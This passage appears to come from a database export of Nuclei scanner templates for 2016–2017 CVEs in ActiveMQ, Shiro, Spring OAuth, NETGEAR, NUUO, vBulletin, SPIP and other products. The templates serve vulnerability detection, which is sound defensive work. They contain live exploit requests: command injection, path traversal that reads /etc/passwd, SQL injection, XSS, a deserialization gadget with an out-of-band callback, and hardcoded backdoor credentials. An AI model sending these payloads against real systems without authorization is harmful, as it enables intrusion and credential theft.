apache\n product: activemq\n tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive\nvariables:\n rand1: '{{rand_int(11111111, 99999999)}}'\n\nhttp:\n - raw:\n - |\n PUT /fileserver/{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n {{rand1}}\n - |\n GET /fileserver/{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1==204\"\n - \"status_code_2==200\"\n - \"contains((body_2), '{{rand1}}')\"\n condition: and\n# digest: 490a0046304402206b7bd3e2e8e6558b6bd1ed2ed9786d1aa61b2f80c5153900102307acfbd8680302204f6528318fe66f51da0b6a08ecc218072d115dbdc42a066c07081d1a0dc1c58d:922c64590222798bb761d5b6d8e72950", "hash": "94e30c6c6317f5ee4da8baf54bf20393", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9b" }, "name": "CVE-2016-3978.yaml", "content": "id: CVE-2016-3978\n\ninfo:\n name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the \"redirect\" parameter to \"login.\"\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft.\n remediation: |\n Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability.\n reference:\n - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2016-3978\n - http://seclists.org/fulldisclosure/2016/Mar/68\n - http://www.securitytracker.com/id/1035332\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-3978\n cwe-id: CWE-79\n epss-score: 0.00217\n epss-percentile: 0.59667\n cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fortinet\n product: fortios\n tags: cve2016,cve,redirect,fortinet,fortios,seclists\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login?redir=http://www.interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950", "hash": "87bff89ddb0f772563cc23794b9ca602", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9c" }, "name": "CVE-2016-4437.yaml", "content": "id: CVE-2016-4437\n\ninfo:\n name: Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Apache Shiro before 1.2.5, when a cipher key has not been configured for the \"remember me\" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.\n impact: |\n Remote code execution\n remediation: |\n Upgrade to a patched version of Apache Shiro\n reference:\n - https://github.com/Medicean/VulApps/tree/master/s/shiro/1\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437\n - http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html\n - http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html\n - http://rhn.redhat.com/errata/RHSA-2016-2035.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2016-4437\n cwe-id: CWE-284\n epss-score: 0.97507\n epss-percentile: 0.99981\n cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: shiro\n tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - dns\n# digest: 4b0a00483046022100fb046cc08189c3a3e20f44ffc1f443e657b070eae65463098ac3eb10d32969300221009acd50c19a5ec2239925b1ff303224e37e8b277b8b11b7f92b84141650cd97f8:922c64590222798bb761d5b6d8e72950", "hash": "a330434a780be0d022436539be427f8c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9d" }, "name": "CVE-2016-4975.yaml", "content": "id: CVE-2016-4975\n\ninfo:\n name: Apache mod_userdir CRLF injection\n author: melbadry9,nadino,xElkomy\n severity: medium\n description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.\n impact: |\n Successful exploitation of this vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and cache poisoning.\n remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.\n reference:\n - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975\n - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975\n - https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E\n - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E\n - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-4975\n cwe-id: CWE-93\n epss-score: 0.00399\n epss-percentile: 0.70799\n cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: http_server\n tags: cve2016,cve,crlf,apache,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)'\n# digest: 4a0a004730450220591243f64cba0b0c03d215d27b7a16783b2fbfb438d316dddf5577fd604ee4ed022100bf652b4a095563057b28cc33ac56040cc57495913b1ae8057328d07775384658:922c64590222798bb761d5b6d8e72950", "hash": "3f1ec192464e1728fb700ed898bfe32b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9e" }, "name": "CVE-2016-4977.yaml", "content": "id: CVE-2016-4977\n\ninfo:\n name: Spring Security OAuth2 Remote Command Execution\n author: princechaddha\n severity: high\n description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.\n remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.\n reference:\n - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md\n - https://tanzu.vmware.com/security/cve-2016-4977\n - https://nvd.nist.gov/vuln/detail/CVE-2016-4977\n - https://pivotal.io/security/cve-2016-4977\n - http://www.openwall.com/lists/oss-security/2019/10/16/1\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-4977\n cwe-id: CWE-19\n epss-score: 0.03345\n epss-percentile: 0.91147\n cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: pivotal\n product: spring_security_oauth\n tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Unsupported response types: [978015547]\"\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022100a996c40fae1f6d19435d135651a1168704634ae606188ed97fef12f4c8a2d3f6022016d0ce56e41a19dd65b863a46c1d4351dbf1e34b890044f16642401ec20f6b0a:922c64590222798bb761d5b6d8e72950", "hash": "087eae980400297a2b51d2b5acbc3dae", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9f" }, "name": "CVE-2016-5649.yaml", "content": "id: CVE-2016-5649\n\ninfo:\n name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure\n author: suman_kar\n severity: critical\n description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.\n impact: |\n An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.\n remediation: |\n Update the router firmware to the latest version, which includes a fix for the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2016-5649\n - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html\n - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-5649\n cwe-id: CWE-319,CWE-200\n epss-score: 0.17436\n epss-percentile: 0.95662\n cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: dgn2200_firmware\n tags: cve2016,cve,iot,netgear,router,packetstorm\n\nhttp:\n - raw:\n - |\n GET /BSW_cxttongr.htm HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Smart Wizard Result \"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: password\n group: 1\n regex:\n - 'Success \"([a-z]+)\"'\n part: body\n# digest: 4b0a00483046022100b7aada274ac2abfee6b3697e0eda3050e81087c45c7ed3335655e3de2aecf912022100f066ed059d53b5052f87883ac4424f08d89de9cb66a856fe727c338c948f018f:922c64590222798bb761d5b6d8e72950", "hash": "af7c3600fe2f7c958d092dde73fef7bd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa0" }, "name": "CVE-2016-5674.yaml", "content": "id: CVE-2016-5674\n\ninfo:\n name: NUUO NVR camera `debugging_center_utils_.php` - Command Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n __debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.\n reference:\n - http://www.kb.cert.org/vuls/id/856152\n - https://www.exploit-db.com/exploits/40200/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-5674\n cwe-id: CWE-20\n epss-score: 0.95705\n epss-percentile: 0.99378\n cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: netgear\n product: readynas_surveillance\n fofa-query: app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\"\n tags: cve,cve2016,nuuo,rce\n\nvariables:\n rand: \"{{to_lower(rand_text_alpha(32))}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id\"\n - \"{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"contains(body_1, 'Debugging Center')\"\n - \"regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)\"\n condition: and\n\n - type: dsl\n dsl:\n - \"status_code_2 == 200\"\n - \"contains(body_2, 'Debugging Center')\"\n - \"contains(body_2, 'Windows IP')\"\n condition: and\n# digest: 4a0a004730450220385c9c6da58edd672651a5e46895e146cc465ebca8ee3b813d44d6f616d0c378022100811021f1ae97e681a6f84ee297e881a5e855bfaa37a652ccc045f2cee6aa21b0:922c64590222798bb761d5b6d8e72950", "hash": "45b1b44f111657da288a2430b413fb23", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa1" }, "name": "CVE-2016-6195.yaml", "content": "id: CVE-2016-6195\n\ninfo:\n name: vBulletin <= 4.2.3 - SQL Injection\n author: MaStErChO\n severity: critical\n description: |\n vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.\n reference:\n - https://www.cvedetails.com/cve/CVE-2016-6195/\n - https://www.exploit-db.com/exploits/38489\n - https://enumerated.wordpress.com/2016/07/11/1/\n - http://www.vbulletin.org/forum/showthread.php?t=322848\n - https://github.com/drewlong/vbully\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-6195\n cwe-id: CWE-89\n epss-score: 0.00284\n epss-percentile: 0.68042\n cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 6\n vendor: vbulletin\n product: vbulletin\n shodan-query: title:\"Powered By vBulletin\"\n tags: cve2016,cve,vbulletin,sqli,forum,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n - \"{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"type=dberror\"\n\n - type: status\n status:\n - 200\n - 503\n condition: or\n# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950", "hash": "2afe811b10e1d1f03b5ff63c7d67585e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa2" }, "name": "CVE-2016-6277.yaml", "content": "id: CVE-2016-6277\n\ninfo:\n name: NETGEAR Routers - Remote Code Execution\n author: pikpikcu\n severity: high\n description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to unauthorized access, data theft, or network compromise.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-6277\n - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/\n - https://www.kb.cert.org/vuls/id/582384\n - http://kb.netgear.com/000036386/CVE-2016-582384\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-6277\n cwe-id: CWE-352\n epss-score: 0.97471\n epss-percentile: 0.99962\n cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: d6220_firmware\n tags: cve2016,cve,netgear,rce,iot,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220486802970cc24d96538b869531c7a01ec169cb576278c3edad08fb0b3171abc802206eba1c836af2a9bbfbf9b2fc2efec581afdaeb05159f11aa43a1a80f99cc78df:922c64590222798bb761d5b6d8e72950", "hash": "f55729fbc4a3f5b0ee84b5dbc71e6342", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa3" }, "name": "CVE-2016-6601.yaml", "content": "id: CVE-2016-6601\n\ninfo:\n name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.\n remediation: |\n Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability.\n reference:\n - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt\n - https://www.exploit-db.com/exploits/40229/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-6601\n - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure\n - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-6601\n cwe-id: CWE-22\n epss-score: 0.97503\n epss-percentile: 0.99977\n cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: webnms_framework\n tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220269d98ed6d3161ad0db0a03a7f0809a5f7c818c3ecc57b34ee4d3d4c63eaab40022100e6f5a74ea3414e32776536a764ae0baf50b8f383108184f7d3181f2b5d68cc24:922c64590222798bb761d5b6d8e72950", "hash": "d347ee500c62435873c5f4aa4008b42a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa4" }, "name": "CVE-2016-7552.yaml", "content": "id: CVE-2016-7552\n\ninfo:\n name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass\n author: dwisiswant0\n severity: critical\n description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the appliance.\n remediation: |\n Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability.\n reference:\n - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4\n - https://nvd.nist.gov/vuln/detail/CVE-2016-7552\n - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-7552\n cwe-id: CWE-22\n epss-score: 0.96711\n epss-percentile: 0.99632\n cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: trendmicro\n product: threat_discovery_appliance\n tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/logoff.cgi\"\n\n headers:\n Cookie: \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Memory map\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d53117f3ea16788cf89c0cecf2d555cae0b79a93d5d3180b39cc4454040ef18d022100cd583d6df3b9dc10200910934624925f94565c114f1dd531e1cd98adc07c4544:922c64590222798bb761d5b6d8e72950", "hash": "4aef0aaaffa2f633cf1652062320925c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa5" }, "name": "CVE-2016-7834.yaml", "content": "id: CVE-2016-7834\n\ninfo:\n name: Sony IPELA Engine IP Camera - Hardcoded Account\n author: af001\n severity: high\n description: |\n Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n impact: |\n An attacker can gain unauthorized access to the camera and potentially control its functions.\n remediation: |\n Upgrade to the latest version of the firmware provided by Sony.\n reference:\n - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/\n - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/\n - https://jvn.jp/en/vu/JVNVU96435227/index.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-7834\n - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras\n classification:\n cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-7834\n cwe-id: CWE-200\n epss-score: 0.00186\n epss-percentile: 0.55032\n cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sony\n product: snc_series_firmware\n tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/command/prima-factory.cgi\"\n\n headers:\n Authorization: Bearer cHJpbWFuYTpwcmltYW5h\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'gen5th'\n - 'gen6th'\n condition: or\n\n - type: status\n status:\n - 204\n# digest: 490a0046304402202f5f026ed0363e14939a797e8be1ba25052d97aeffbf9c4028fab947ee7964bc0220162d36ff26de6a7b2d99f415da04726f6316c88fb6f54a668f3814dff2f37ff4:922c64590222798bb761d5b6d8e72950", "hash": "96bb35bf22fa646dbe75a68b7a4f47f7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa6" }, "name": "CVE-2016-7981.yaml", "content": "id: CVE-2016-7981\n\ninfo:\n name: SPIP <3.1.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser.\n remediation: |\n Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability.\n reference:\n - https://core.spip.net/projects/spip/repository/revisions/23202\n - https://core.spip.net/projects/spip/repository/revisions/23201\n - https://core.spip.net/projects/spip/repository/revisions/23200\n - https://nvd.nist.gov/vuln/detail/CVE-2016-7981\n - http://www.openwall.com/lists/oss-security/2016/10/05/17\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-7981\n cwe-id: CWE-79\n epss-score: 0.00258\n epss-percentile: 0.63488\n cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: spip\n product: spip\n tags: cve2016,cve,xss,spip\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ee1a0cc74545408c97919b9f1220c0b8a04761f7969c872553fdf8d567516a3a022100a2caf1a3d02114b0e49b46a81c7ac45c62019029e4395dfa4ac12a9aa89935ea:922c64590222798bb761d5b6d8e72950", "hash": "9a95450856d9e31a37894187179d4f29", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa7" }, "name": "CVE-2016-8527.yaml", "content": "id: CVE-2016-8527\n\ninfo:\n name: Aruba Airwave <8.2.3.1 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/41482\n - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt\n - https://www.exploit-db.com/exploits/41482/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-8527\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-8527\n cwe-id: CWE-79\n epss-score: 0.00166\n epss-percentile: 0.53225\n cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: airwave\n tags: cve2016,cve,aruba,xss,edb,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950", "hash": "ec74fef44a8b363dbcd0f40c3d1eeafd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa8" }, "name": "CVE-2017-0929.yaml", "content": "id: CVE-2017-0929\n\ninfo:\n name: DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery\n author: charanrayudu,meme-lord\n severity: high\n description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above.\n reference:\n - https://hackerone.com/reports/482634\n - https://nvd.nist.gov/vuln/detail/CVE-2017-0929\n - 